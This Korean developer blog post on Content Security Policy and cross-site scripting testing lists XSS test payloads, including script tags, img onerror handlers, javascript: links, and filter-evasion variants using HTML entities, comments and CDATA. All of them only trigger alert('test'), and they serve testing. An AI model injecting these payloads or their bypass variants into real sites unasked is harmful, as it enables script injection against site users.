CSP와 XSS테스트 코드

사이트 간 스크립팅, 크로스 사이트 스크립팅

Posted by : yoo94 on Apr 1, 2023

CSP 콘텐츠 보안정책

Pasted image 20240205203449.png Pasted image 20240205203510.png

xss테스트

테스트 방법

<script>alert('test');</script>
<img src=x onerror=alert('test')>
<a href="javascript:alert('test')">Click me</a>

--------------------------------------------------------

이스케이프(escaping) 우회 시도
<scr\ipt>alert('test');</scr\ipt>
<img src=x onerror=ale&#x72t('test')>
<a href="jav&#x61script:alert('test')">Click me</a>

--------------------------------------------------------

이벤트 핸들러 우회 시도
<img src=x onerror=alert('test')>
<img src=x onerror="alert('test')">
<img src=x onerror=alert\('test'\)>

--------------------------------------------------------

HTML 주석을 이용한 우회 시도
<!--<img src=x onerror=alert('test')>-->
<!--><img src=x onerror=alert('test')><!-->
<![CDATA[<script>alert('test');</script>]]>

--------------------------------------------------------

스크립트 블록을 이용한 우회 시도:
<img src=x onerror="javascript:alert('test')">
<img src=x onerror="data:text/html,<script>alert('test');</script>">

About 유재석

개발자 유재석 입니다. Web Developer.

Email : jaeseok9405@gmail.com

Website : https://github.com/yoo94